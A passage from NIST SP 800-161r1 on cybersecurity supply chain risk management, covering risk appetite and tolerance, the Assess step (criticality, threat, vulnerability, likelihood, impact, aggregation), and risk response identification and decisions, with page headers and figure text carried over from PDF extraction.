In some cases, organizational leaders may find it necessary to rebalance guidance to avoid excess
risk aversion behavior (i.e., performance below appetite) or excess risk-seeking behavior (i.e.,
performance above appetite) by decision makers.
Table G-7 shows additional examples of how risk appetite and risk tolerance statements work
together to frame risk within an enterprise.
Table G-7: Supply Chain Risk Appetite and Risk Tolerance
Enterprise Constraints
Supply Chain Constraints
Low appetite for risk with respect
to market objectives and requires
24/7 uptime
Low tolerance (i.e., no more than 5 % probability) for
service provider downtime that causes system
disruptions to exceed contractual service level
agreements (SLAs) by more than 10 %
Low appetite for risk with respect
to production objectives that require
> 99 % on-time delivery of products
to customers with national security
missions
Near-zero tolerance (i.e., no more than 5 %
probability) for supply chain disruptions that cause
production levels to fall below 99 % of target threshold
for military products
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
276
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Enterprise Constraints
Supply Chain Constraints
Low appetite for risk related to
national security objectives that
require 99 % effectiveness of
security processes
Low tolerance (i.e., no more than 1 % of contractor
access authorizations) for inappropriate contractor
access that exceeds authorized windows by more than
10 % in systems with classified information
Moderate appetite for risk related
to operational objectives of non-
mission critical areas that require
99.5 % availability
Moderate tolerance (i.e., no more than 15 %
probability) for system component failures causing
non-critical system disruptions that exceed recovery
time objectives by more than 10 %
To ensure that leadership has the appropriate information when making risk-based decisions,
enterprises should establish measures (e.g., key performance indicators [KPIs], key risk
indicators [KRIs]) to measure performance against defined risk appetite and risk tolerance
statements. The identification of corresponding data sources for measurement should play a key
role in the enterprise’s defined processes for setting and refining risk appetite and tolerance
statements. Risk appetite and risk tolerance should be treated as dynamic by the enterprise. This
requires periodic updates and revisions based on internal (e.g., new leadership, strategy) and
external (e.g., market, environmental) changes that impact the enterprise.
Enterprises should consider supply chain cybersecurity threats, vulnerabilities, constraints, and
criticality when establishing, operationalizing, and maintaining the overall level of risk appetite
and risk tolerance.65
PRIORITIES AND TRADE-OFFS
TASK 1-4: Identify priorities and trade-offs considered by the enterprise in managing risk.
Supplemental Guidance
Priorities and trade-offs are closely linked to the enterprise’s risk appetite and tolerance
statements, which communicate the amount of risk that is acceptable and tolerable to the
enterprise in pursuit of its objectives. Priorities will take the form of long-term strategic
objectives or near-term strategic imperatives that alter the risk decision calculus. From priorities
and trade-offs, C-SCRM then receives critical strategic context required for Response step
activities, such as Evaluation of Alternatives and Risk Response Decision. As a part of
identifying priorities and trade-offs, enterprises should consider risk appetite, risk tolerance,
supply chain cybersecurity threats, vulnerabilities, constraints, and criticality.
Priority and trade-off considerations will manifest different across the three levels. At Level 1,
priority and trade-off considerations may favor existing supplier relationships in established
65 The governance structures of federal departments and agencies vary widely (see [NIST SP 800-100, Section 2.2.2]).
Regardless of the governance structure, individual agency risk decisions should apply to the agency and any subordinate
organizations but not vice versa.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
277
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
regions at the expense of new supplier cost advantages due to a desire to maintain confidence
and stability. At Level 2, priority and trade-off considerations may favor centralized C-SCRM
governance models that cover product teams in favor of greater security practice standardization.
At Level 3, priorities and trade-offs may favor system components/sub-components that are
produced in certain geographies in an effort to avoid environmental or geopolitical risks to the
supply chain.
Outputs and Post Conditions
Within the scope of [NIST SP 800-39], the output of the risk framing step is the risk
management strategy that identifies how enterprises intend to assess, respond to, and monitor
risk over time. This strategy should clearly include any identified C-SCRM considerations and
should result in the establishment of C-SCRM-specific processes throughout the agency. These
processes should be documented in one of three ways:
1. Integrated into existing agency documentation,
2. Described in a separate set of documents that address C-SCRM, or
3. Utilizing a mix of separate and integrated documents based on agency needs and
operations.
Regardless of how the outputs are documented, the following information should be provided as
an output of the risk framing step:
• C-SCRM policy;
• Criticality, including prioritized mission and business processes and [FIPS 199] impact;
• Cybersecurity supply chain risk assessment methodology and guidance;
• Cybersecurity supply chain risk response guidance;
• Cybersecurity supply chain risk monitoring guidance;
• C-SCRM mission and business requirements;
• Revised mission and business processes and enterprise architecture with C-SCRM
considerations integrated;
• Operational level C-SCRM requirements; and
• Acquisition security guidance/requirements.
Outputs from the risk framing step enable prerequisites to effectively manage cybersecurity risks
throughout the supply chain and serve as inputs to the risk assessment, risk response, and risk
monitoring steps.
Assess
Inputs and Preconditions
Assess is the step where assumptions, established methodologies, and collected data are used to
conduct a risk assessment. Numerous inputs (including criticality, risk appetite and tolerance,
threats, vulnerability analysis, stakeholder knowledge, policy, constraints, and requirements) are
combined and analyzed to gauge the likelihood and impact of a supply chain cybersecurity
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
278
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
compromise. Assess step activities are used to update the enterprise’s long-term risk-framing
assumptions to account for near-term variations and changes.
A cybersecurity supply chain risk assessment should be integrated into the overall enterprise risk
assessment process. C-SCRM risk assessment results should be used and aggregated as
appropriate to communicate potential or actual cybersecurity risks throughout the supply chain
relevant to each risk management framework level. Figure G-6 depicts the Assess step with its
inputs and outputs along the three levels.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
279
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Fig. G-6: C-SCRM in the Assess Step66
Criticality, vulnerability, and threat analyses are essential to the supply chain risk assessment
process. The order of activities begins with updating the criticality analysis to ensure that the
assessment is scoped to minimally include relevant critical mission and business processes and to
understand the relevance and impact of supply chain elements on these mission and business
processes. As depicted in Figure G-5, vulnerability and threat analyses can then be performed in
any order but should be performed iteratively to ensure that all applicable threats and
66 More detailed information on the Risk Management Process can be found in Appendix C.
Inputs
Assess
Outputs
Enterprise
Mission/Business Process
Operational
• Enterprise and C-SCRM
risk assessment
methodologies
• Breadth and depth
requirements for risk
analysis
• Guidance for
aggregating risk to the
enterprise-level
• Output of Level 1 C-
SCRM
Risk Framing
• Level 2 and 3 C-SCRM
Assessments
• C-SCRM risk monitoring
outputs
• Supplier inventory
• Update longer term C-
SCRM FRAME with up-
to-date context and
assumptions
• Assess cybersecurity
risks in the supply
chain to enterprise-
level operations,
assets, and individuals
• Refine, enhance, and
aggregate Level 2 and
3 assessments
• Aggregated enterprise-
level C-SCRM risk
profile
• enterprise-level supply
chain cybersecurity risk
assessment results
• Mission/business-
specific C-SCRM risk
assessment
methodologies
• Output of Level 2 C-
SCRM
Risk Framing
• Guidance for
aggregating risk to the
specific
mission/business
• Level 2 and 3 C-SCRM
Assessments
• C-SCRM risk monitoring
outputs
• Supplier inventory
• Asset inventory
• Update longer term C-
SCRM FRAME with up-
to-date context and
assumptions
• Assess cross-cutting
supply chain
cybersecurity threats
and vulnerabilities
• Assess cybersecurity
risks in the supply
chain to
mission/business-level
operations, assets, and
individuals
• Refine, enhance, and
aggregate applicable
Level 3 assessments
• Assessment results
showing cross-cutting
cybersecurity risks in
the supply chain
• Aggregated
mission/business-
specific C-SCRM risk
profile
• Mission/business-
specific supply chain
cybersecurity risk
assessment results
• Operational-level C-
SCRM requirements
• Operational business
impact analyses for
supported
missions/businesses
• System component
inventory
• Supplier inventory
• Operational C-SCRM
risk
monitoring outputs
• Assess cybersecurity
risks in the supply
chain for systems,
system components,
system services, and
operations
• Operational-level risk
assessment results
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
280
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
vulnerabilities have been identified to understand which vulnerabilities may be more susceptible
to exploitation by certain threats and – if and as applicable – to associate identified
vulnerabilities and threats to one or more mission and business processes or supply chain
elements. Once viable threats and potential or actual vulnerabilities are assessed, this information
will be used to evaluate the likelihood of exploitability – a key step to understanding impact.
This is a synthesis point for criticality analysis, vulnerability analysis, and threat analysis and
helps to further clarify and contextualize impact to support an informed and justifiable risk
decision.
Activities
CRITICALITY ANALYSIS
TASK 2-0: Update the criticality analysis of mission and business processes, systems, and
system components to narrow the scope (and resource needs) for C-SCRM activities to those
most important to mission success.
Supplemental Guidance
Criticality analysis should include the supply chain for the enterprise and applicable suppliers,
developers, system integrators, external system service providers, and other ICT/OT-related
service providers, as well as relevant non-system services and products. Criticality analysis
assesses the direct impact that each entity has on mission priorities. The supply chain includes
the SDLC for applicable systems, services, and components because the SDLC defines whether
security considerations are built into the systems/components or added after the
systems/components have been created.
Enterprises should update and tailor criticality established during the Frame step of the risk
management process, including the [FIPS 199] system. For low-impact systems, enterprises
should minimally assess criticality regarding interdependencies that systems may have with
moderate or high-impact systems. If systems are used extensively throughout the enterprise,
enterprises should determine the holistic impact of component failure or compromise in the low
impact system.
In addition to updating and tailoring criticality, performing criticality analysis in the Assess step
may include the following:
• Refining the dependency analysis and assessment to understand which components may
require hardening given the system or network architecture;
• Obtaining and reviewing existing information that the agency has about critical
systems/components, such as locations where they are manufactured or developed,
physical and logical delivery paths, information flows and financial transactions
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
281
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
associated with these components, and any other available information that can provide
insights into the supply chain of these components;67 and
• Updating information about the supply chain, historical data, and the SDLC to identify
changes in critical supply chain paths and conditions.
The outcome of the updated criticality analysis is a narrowed, prioritized list of the enterprise’s
critical processes, systems, and system components, as well as a refined understanding of
corresponding dependencies within the supply chain. Enterprises can use the criticality process
in Task 1-1 to update their criticality analysis.
Because more information will be available in the Assess step, enterprises can narrow the scope
and increase the granularity of a criticality analysis. When identifying critical processes and
associated systems/components and assigning them criticality levels, consider the following:
• Functional breakdown is an effective method for identifying processes and associated
critical components and supporting defensive functions.
• Disaster recovery and continuity of operations plans often define critical systems and
system components, which can be helpful in assigning criticality.
• Dependency analysis is used to identify the processes on which other critical processes
depend (e.g., defensive functions, such as digital signatures used in software patch
acceptance).
• The identification of all access points helps identify and limit unmediated access to
critical functions and components (e.g., least-privilege implementation).
• Value chain analysis enables the understanding of inputs, process actors, outputs, and
customers of services and products.
• Malicious alteration or other types of supply chain compromise can happen throughout
the SDLC.
The resulting list of critical processes and supply chain dependencies is used to guide and inform
vulnerability analysis and threat analysis in determining the initial C-SCRM risk, as depicted in
Figure D-4. Supply chain countermeasures and mitigations can then be selected and
implemented to reduce risk to acceptable levels.
Criticality analysis is performed iteratively and may be performed at any point in the SDLC and
concurrently by level. The first iteration is likely to identify critical processes and systems or
components that have a direct impact on mission and business processes. Successive iterations
will include information from the criticality analysis, threat analysis, vulnerability analysis, and
mitigation strategies defined at each of the other levels. Each iteration will refine the criticality
analysis outcomes and result in the addition of defensive functions. Several iterations will likely
be required to establish and maintain criticality analysis results. Enterprises should document or
67 This information may be available from a supply chain map for the agency or individual IT projects or systems. Supply chain
maps are descriptions or depictions of supply chains that include the physical and logical flow of goods, information, processes,
and money upstream and downstream through a supply chain. They may include supply chain entities, locations, delivery paths,
or transactions.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
282
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
record the results of their criticality analysis and review and update this assessment on an annual
basis, at minimum.
THREAT AND VULNERABILITY IDENTIFICATION
TASK 2-1: Identify threats to and vulnerabilities in enterprise information systems and the
environments in which the systems operate.
Supplemental Guidance
In addition to threat and vulnerability identification, as described in [NIST SP 800-39] and
[NIST SP 800-30, Rev. 1], enterprises should conduct supply chain cybersecurity threat analysis
and vulnerability analysis.
Threat Analysis
For C-SCRM, a threat analysis provides specific and timely characterizations of threat events
(see Appendix C), potential threat actors (e.g., nation-state), and threat vectors (e.g., third-party
supplier) to inform management, acquisition, engineering, and operational activities within an
enterprise.68 A variety of information can be used to assess potential threats, including open
source, intelligence, and counterintelligence. Enterprises should include, update, and refine the
threat sources and assumptions defined during the Frame step. The results of the threat analysis
will ultimately support acquisition decisions, alternative build decisions, and the development
and selection of appropriate mitigations to be applied in the Respond step. The focus of supply
chain threat analysis should be based on the results of the criticality analysis.
Enterprises should use the information available from existing incident management activities to
determine whether they have experienced a supply chain cybersecurity compromise and to
further investigate such compromises. Agencies should define criteria for what constitutes a
supply chain cybersecurity compromise to ensure that such compromises can be identified as a
part of post-incident activities, including forensics investigations. Additionally – at agency-
defined intervals – agencies should review other sources of incident information within the
enterprise to determine whether a supply chain compromise has occurred.
A supply chain cybersecurity threat analysis should capture at least the following data:
• An observation of cybersecurity supply chain-related attacks while they are occurring;
• Incident data collected post-cybersecurity supply chain-related compromise;
• An observation of tactics, techniques, and procedures used in specific attacks, whether
observed or collected using audit mechanisms; and
• Natural and human-made disasters before, during, and after occurrence.
68 Note that the threat characterization of suppliers, developers, system integrators, external system service providers, and other
ICT/OT-related service providers may be benign.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
283
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Vulnerability Analysis
For C-SCRM, a vulnerability is a weakness in an information system, system security
procedures, internal controls, or implementation that could be exploited or triggered by a threat
source [NIST SP 800-53, Rev. 5].
A vulnerability analysis is an iterative process that informs risk assessments and countermeasure
selection. The vulnerability analysis works alongside the threat analysis to help inform the
impact analysis and to help scope and prioritize the vulnerabilities to be mitigated.
Vulnerability analysis in the Assess step should use the approaches defined during the Frame
step to update and refine assumptions about supply chain cybersecurity vulnerabilities.
Vulnerability analysis should begin by identifying vulnerabilities that are applicable to critical
mission and business processes and the systems or system components identified by the
criticality analysis. An investigation of vulnerabilities may indicate the need to raise or at least
reconsider the criticality levels of processes and components identified in earlier criticality
analyses. Later iterations of the vulnerability analysis may also identify additional threats or
opportunities for threats that were not considered in earlier threat assessments.
Table G-8 provides examples of applicable supply chain cybersecurity vulnerabilities that can be
observed within the three levels.
Table G-8: Examples of Supply Chain Cybersecurity Vulnerabilities Mapped to the
Enterprise Levels
Level
Vulnerability Consideration
Methods
Level 1 –
Enterprise
1) Deficiencies or weaknesses in
enterprise governance
structures or processes, such as
the lack of a C-SCRM Plan
2) Weaknesses in the supply chain
itself (e.g., vulnerable entities,
over-reliance on certain
entities)
1) Provide guidance on how to consider
dependencies on external enterprises
as vulnerabilities.
2) Seek out alternative sources of new
technology, including building in-
house and leveraging trustworthy
shared services and common
solutions.
Level 2 –
Mission and
Business
1) No operational process in place
for detecting counterfeits
2) No budget allocated for the
implementation of a technical
screening for acceptance
testing of supplied system
components entering the SDLC
as replacement parts
1) Develop a program for detecting
tainted or counterfeit products, and
allocate an appropriate budget for
resources and training.
2) Allocate a budget for acceptance
testing (technical screening of
components entering the SDLC).
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
284
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
3) Susceptibility to adverse issues
from innovative technology
supply sources (e.g.,
technology owned or managed
by third parties is buggy)
Level 3 –
Operation
1) Discrepancy in system
functions not meeting
requirements, resulting in
substantial impact to
performance
1) Initiate engineering changes to
address functional discrepancy, and
test corrections for performance
impacts. Malicious alteration can
happen to an agency system
throughout the system life cycle.
2) Review vulnerabilities disclosed in
the vulnerability disclosure report
(VDR) published by software
vendors.
RISK DETERMINATION
TASK 2-2: Determine the risk to enterprise operations and assets, individuals, other enterprises,
and the Nation if identified threats exploit identified vulnerabilities.
Supplemental Guidance
Enterprises identify cybersecurity risks throughout the supply chain by considering the
likelihood that known threats exploit known vulnerabilities to and through the supply chain, as
well as the resulting consequences or adverse impacts (i.e., magnitude of harm) if such
exploitations occur. Enterprises use threat and vulnerability information with likelihood and
consequences/impact information to determine C-SCRM risk either qualitatively or
quantitatively. Outputs from the Risk Determination at Level 1 and Level 2 should correspond
directly with the RMF Prepare – Enterprise Level tasks described in [NIST 800-37, Rev. 2],
while risk assessments completed for Level 3 should correspond directly with the RMF Prepare –
Operational Level tasks.
Likelihood
Likelihood is a weighted factor based on a subjective analysis of the probability that a given
threat is capable of exploiting a given vulnerability [CNSSI 4009]. Determining this likelihood
requires consideration of the characteristics of the threat sources, the identified vulnerabilities,
and the enterprise’s susceptibility to the supply chain cybersecurity compromise prior to and
while the safeguards or mitigations are implemented. Likelihood determination should draw on
methodologies defined as part of the Frame step and update, refine, and expand any assumptions
made about likelihood. For adversarial threats, this analysis should consider the degree of an
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
285
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
adversary’s capability and intent to interfere with the enterprise’s mission. A cybersecurity
supply chain risk assessment should consider two views:
1. The likelihood that one or more elements within the supply chain itself is compromised.
This may impact, for example, the availability of quality components or increase the risk
of intellectual property theft.
2. The likelihood of the system or component within the supply chain being compromised,
for example, by malicious code inserted into a system or an electrical storm damaging a
component.
In some cases, these two views may overlap or be indistinguishable, but both may have an
impact on the agency’s ability to perform its mission.
A likelihood determination should consider:
• Threat assumptions that articulate the types of threats that the system or the component
may be subject to, such as cybersecurity threats, natural disasters, or physical security
threats
• Actual supply chain threat information, such as adversaries’ capabilities, tools, intentions,
and targets
• Historical data about the frequency of supply chain events in peer or like enterprises
• Internal expert perspectives on the probability of a system or process compromise
through the supply chain
• Exposure of components to external access (i.e., outside of the system boundary)
• Identified system, process, or component vulnerabilities
• Empirical data on weaknesses and vulnerabilities available from any completed analysis
(e.g., system analysis, process analysis) to determine the probabilities of supply chain
cybersecurity threat occurrence
Factors for consideration include the ease or difficulty of successfully attacking through a
vulnerability and the ability to detect the method employed to introduce or trigger a
vulnerability. The objective is to assess the net effect of the vulnerability, which will be
combined with threat information to determine the likelihood of successful attacks within a
defined time frame as part of the risk assessment process. The likelihood can be based on threat
assumptions or actual threat data, such as previous breaches of the supply chain, specific
adversary capabilities, historical breach trends, or the frequency of breaches. The enterprise may
use empirical data and statistical analysis to determine the specific probabilities of breach
occurrence, depending on the type of data available and accessible within the enterprise.
Impact
Enterprises should begin impact analysis using methodologies and potential impact assumptions
defined during the Frame step to determine the impact of a compromise and the impact of
mitigating said compromise. Enterprises need to identify the various adverse impacts of
compromise, including 1) the characteristics of the threat sources that could initiate the events, 2)
identified vulnerabilities, and 3) the enterprise’s susceptibility to such events based on planned or
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
286
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
implemented countermeasures. Impact analysis is an iterative process performed initially when a
compromise occurs, when a mitigation approach is decided to evaluate the impact of change, and
in the ever-changing SDLC when the situation or context of the system or environment changes.
Enterprises should use the results of an impact analysis to define an acceptable level of
cybersecurity risks throughout the supply chain related to a specific system. Impact is derived
from criticality, threat, and vulnerability analysis results and should be based on the magnitude
of effect on enterprise operations, enterprise assets, individuals, other enterprises, or the Nation
(including the national security interests of the United States) of a loss of confidentiality,
integrity, or availability of information or an information system [NIST SP 800-53, Rev. 5].
Impact is likely to be a qualitative measure requiring analytic judgment. Executive/decision-
makers use impact as an input into risk-based decisions and whether to accept, avoid, mitigate, or
share the resulting risks and the consequences of such decisions.
Enterprises should document the overall results of assessments of cybersecurity risk throughout
the supply chain in risk assessment reports.69 Cybersecurity supply chain risk assessment reports
should cover risks in all three enterprise levels, as applicable. Based on the enterprise structure
and size, multiple assessment reports on cybersecurity risks throughout the supply chain may be
required. Agencies are encouraged to develop individual reports at Level 1. For Level 2,
agencies should integrate cybersecurity risks throughout the supply chain into the respective
mission-level business impact analysis (BIA) and may want to develop separate mission-level
assessment reports on cybersecurity risks throughout the supply chain. For Level 3, agencies
may want to integrate cybersecurity risks throughout the supply chain into the respective Risk
Response Framework. Risk Response Frameworks at all three levels should be interconnected,
reference each other when appropriate, integrate with the C-SCRM Plans, and comprise part of
authorization packages.
Aggregation
Enterprises may use risk aggregation to combine several discrete or lower-level risks into a more
general or higher-level risk [NIST SP 800-30, Rev. 1]. Risk aggregation is especially important
for C-SCRM as enterprises strive to understand their risk exposure to the supply chain in contrast
to assets at different levels of the organization. Ultimately, enterprises may wish to aggregate and
normalize their C-SCRM risk assessment results with other enterprise risk assessments to
develop an understanding of their total risk exposure across risk types (e.g., financial,
operational, legal/regulatory). This aggregation may occur at an enterprise level in cases where
the enterprise consists of multiple subordinate enterprises. Each subordinate enterprise would
combine and normalize risks within a single enterprise risk register. Risk aggregation may also
occur from Level 2 mission and business process level registers into a single Level 1 enterprise-
level risk register. To ease this process, enterprises should maximize inheritance of common
frameworks and lexicons from higher-order risk processes (e.g., enterprise risk management).
When dealing with discrete risks (i.e., non-overlapping), enterprises can more easily develop a
holistic understanding of aggregate Level 1 and Level 2 risk exposures. In many cases, however,
69 See [NIST SP 800-30, Rev. 1] Appendix K for a description of risk assessment reports.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
287
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
enterprises will find that risk assessments completed at lower levels contain overlapping
estimates for likelihood and impact magnitude. In these cases, the sum of the pieces (i.e., risk
exposure ratings at lower levels) are greater than the whole (i.e., aggregate risk exposure of the
enterprise). To overcome these challenges, enterprises can employ a variety of techniques.
Enterprises may elect to use visualizations or heat maps to demonstrate the likelihood and impact
of risks relative to one another. When presenting aggregate risk as a number, enterprises should
ensure that assessments of risk produce discrete outputs by adopting mutually exclusive and
collectively exhaustive (MECE) frameworks. MECE frameworks guide the analysis of inputs
(e.g., threats, vulnerabilities, impacts) and allow the enterprise to minimize overlapping
assumptions and estimates. Instead of summing risks from lower levels together, enterprises may
elect to perform a new holistic assessment at an upper level that leverages the combined
assessment results from lower levels. Doing so can help enterprises avoid double-counting risks,
resulting in an overestimation of their aggregate risk exposure. Enterprises should apply
discretion in aggregating risks so as to avoid risk aggregations that are difficult to explain (e.g.,
combining highly differentiated scenarios into a single number).
Quantitative methods offer distinct advantages for risk aggregation. Through the use of
probabilistic techniques (e.g., Monte Carlo methods, Bayesian analysis), enterprises can combine
similar risks into a single, easily understood figure (e.g., dollars) in a mathematically defensible
manner. Mutually exclusive and collectively exhaustive frameworks remain an important
requirement for quantitative methods.
Outputs and Post Conditions
This step results in:
• Confirmed mission and business process criticality,
• The establishment of relationships between the critical aspects of the system’s supply
chain infrastructure (e.g., SDLC) and applicable threats and vulnerabilities,
• Understanding of the likelihood and impact of a potential supply chain cybersecurity
compromise,
• Understanding mission and system-specific risks,
• Documented assessments of cybersecurity risks throughout the supply chain related to
mission and business processes or individual systems, and
• The integration of results of relevant assessments of cybersecurity risks throughout
supply chain into the enterprise risk management process.
Respond
Inputs and Preconditions
Respond is the step in which the individuals conducting the risk assessment will communicate
the assessment results, proposed mitigation/controls options, and the corresponding acceptable
level of risk for each proposed option to the decision makers. This information should be
presented in an appropriate manner to inform and guide risk-based decisions. This will allow
decision makers to finalize appropriate risk responses based on the set of options and the
corresponding risk factors of choosing the various options. Sometimes, an appropriate response
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
288
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
is to simply monitor the adversary’s activities and behavior to better understand the tactics and
activities.
Cybersecurity supply chain risk response should be integrated into the overall enterprise risk
response. Figure G-6 depicts the Respond step with its inputs and outputs along the three
enterprise levels.
Fig. G-7: C-SCRM in the Respond Step70
70 More detailed information on the Risk Management Process can be found in Appendix C.
Inputs
Respond
Outputs
Enterprise
Mission/Business Process
Operational
• Output of Level 1 C-
SCRM
Risk Framing
• enterprise-level C-
SCRM Policies and
procedures including
risk response guidance
• Level 1, Level 2, and
Level 3 assessments of
cybersecurity risks in
the supply chain
• Make enterprise level
risk response decisions
(e.g.,
accept, avoid,
mitigate, share, and/or
transfer)
• Select, tailor, and
implement C-SCRM
controls and Level-1
common control
baselines
• Document C-SCRM
controls
in POA&Ms
• enterprise-level supply
chain cybersecurity risk
response decisions
• Refined/enhanced C-
SCRM POA&Ms
• Feedback to
enterprise-level
foundational processes
that are not C-SCRM
• Output of Level 2 C-
SCRM
Risk Framing
• Mission/business-
specific policies and
procedures including
risk response guidance
• Level 2, and Level 3
supply chain
cybersecurity risk
assessment results
• Make mission/business-
specific risk response
decisions (e.g.,
accept, avoid,
mitigate, share, and/or
transfer)
• Select, tailor, and
implement C-SCRM
controls and Level-2
common control
baselines
• Document C-SCRM
controls
in POA&Ms
• Mission/business-
specific supply chain
cybersecurity risk
response decisions
• Refined/enhanced C-
SCRM POA&Ms
• Feedback to
mission/business level
foundational processes
that are
not C-SCRM
• Operational-level
supply chain
cybersecurity risk
assessment results
• Make Operational-
specific risk response
decisions (e.g., accept,
avoid, mitigate, share,
and/or transfer)
• Select, tailor, and
implement C-SCRM
controls
• Document C-SCRM
controls in C-SCRM
Plans
• Operational-level
supply chain
cybersecurity
risk decisions
• New/refined/enhanced
C-SCRM Plans
• Feedback to
Operational-level
foundational processes
that are
not C-SCRM
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
289
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Activities
RISK RESPONSE IDENTIFICATION
TASK 3-1: Identify alternative courses of action to respond to risks identified during the risk
assessment.
Enterprise’s risk response strategies will be informed by risk management strategies developed
for the enterprise (i.e., Level 1) and mission and business processes (i.e., Level 2). Risk response
strategies will include general courses of action that the enterprise may take as part of its risk
response efforts (e.g., accept, avoid, mitigate, transfer or share). As part of mitigation efforts,
enterprises should select C-SCRM controls and tailor these controls based on the risk
determination. C-SCRM controls should be selected for all three levels, as appropriate per the
findings of the risk assessments for each of the levels.
Many of the C-SCRM controls included in this document may be part of an IT security plan and
should be incorporated as requirements into agreements made with third-party providers. These
controls are included because they apply to C-SCRM.
This process should begin by determining acceptable risks to support the evaluation of
alternatives (also known as trade-off analysis).
EVALUATION OF ALTERNATIVES
TASK 3-2: Evaluate alternative courses of action for responding to risk.
Once an initial acceptable level of risk has been defined, risk response courses of action should
be identified and evaluated for efficacy in enabling the enterprise to achieve its defined risk
threshold. An evaluation of alternatives typically occurs at Level 1 or Level 2 with a focus on
anticipated enterprise-wide impacts of C-SCRM on the enterprise’s ability to successfully carry
out enterprise missions and processes. When carried out at Level 3, an evaluation of alternatives
focuses on the SDLC or the amount of time available for implementing the course of action.
Each course of action analyzed may include a combination of risk acceptance, avoidance,
mitigation, transfer, and sharing. For example, an enterprise may elect to share a portion of its
risk with a strategic supplier through the selection of controls included under contractual terms.
Alternatively, an enterprise may choose to mitigate risks to acceptable levels through the
selection and implementation of controls. In many cases, risk strategies will leverage a
combination of risk response courses of action.
During the evaluation of alternatives, the enterprise will analyze available risk response courses
of action for identified cybersecurity risks throughout the supply chain. The goal of this exercise
is to enable the enterprise to achieve an appropriate balance between C-SCRM and the
functionality needs of the enterprise. As a first step, enterprises should ensure that risk appetites
and tolerances, priorities, trade-offs, applicable requirements, and constraints are reviewed with
stakeholders who are familiar with the broader enterprise requirements, such as cost, schedule,
performance, policy, and compliance. Through this process, the enterprise will identify risk
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
290
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
response implications to the enterprise’s broader requirements. Equipped with a holistic
understanding of risk response implications, enterprises should perform the C-SCRM, mission,
and operational-level trade-off analyses to identify the correct balance of C-SCRM controls to
respond to risk. At Level 3, the Frame, Assess, Respond, and Monitor process feeds into the
RMF Select step described in [NIST SP 800-37, Rev. 2].
The selected C-SCRM controls for a risk response course of action will vary depending on where
they are applied within enterprise levels and SDLC processes. For example, C-SCRM controls
may range from using a blind buying strategy to the obscure end use of a critical component and
design attributes (e.g., input validation, sandboxes, and anti-tamper design). For each
implemented control, the enterprise should identify someone who will be responsible for its
execution and develop a time- or event-phased plan for implementation throughout the SDLC.
Multiple controls may address a wide range of possible risks. Therefore, understanding how the
controls impact the overall risk is essential and must be considered before choosing and tailoring
the combination of controls as yet another trade-off analysis may be needed before the controls
can be finalized. The enterprise may be unknowingly trading one risk for a larger risk if the
dependencies between the proposed controls and the overall risk are not well-understood and
addressed.
RISK RESPONSE DECISION
TASK 3-3: Decide on the appropriate course of action for responding to risk.
As described in [NIST SP 800-39], enterprises should select, tailor, and finalize C-SCRM
controls based on an evaluation of alternatives and an overall understanding of threats, risks, and
supply chain priorities. Within Level 1 and Level 2, the resulting decision and the selected and
tailored common control baselines (i.e., revisions to established baselines) should be documented
within a C-SCRM-specific Risk Response Framework.71 Within Level 3, the resulting decision
and the selected and tailored controls should be documented within the C-SCRM plan as part of
an authorization package.
Risk response decisions may be made by a risk executive or delegated by the risk executive to
someone else in the enterprise. While the decision can be delegated to Level 2 or Level 3, the
significance and the reach of the impact should determine the level at which the decision is being
made. Risk response decisions may be made in collaboration with an enterprise’s risk executives,
mission owners, and system owners, as appropriate. Risk response decisions are heavily
influenced by the enterprise’s predetermined appetite and tolerance for risk. Using robust risk
appetite and tolerance definitions, decision makers can ensure consistent alignment of the
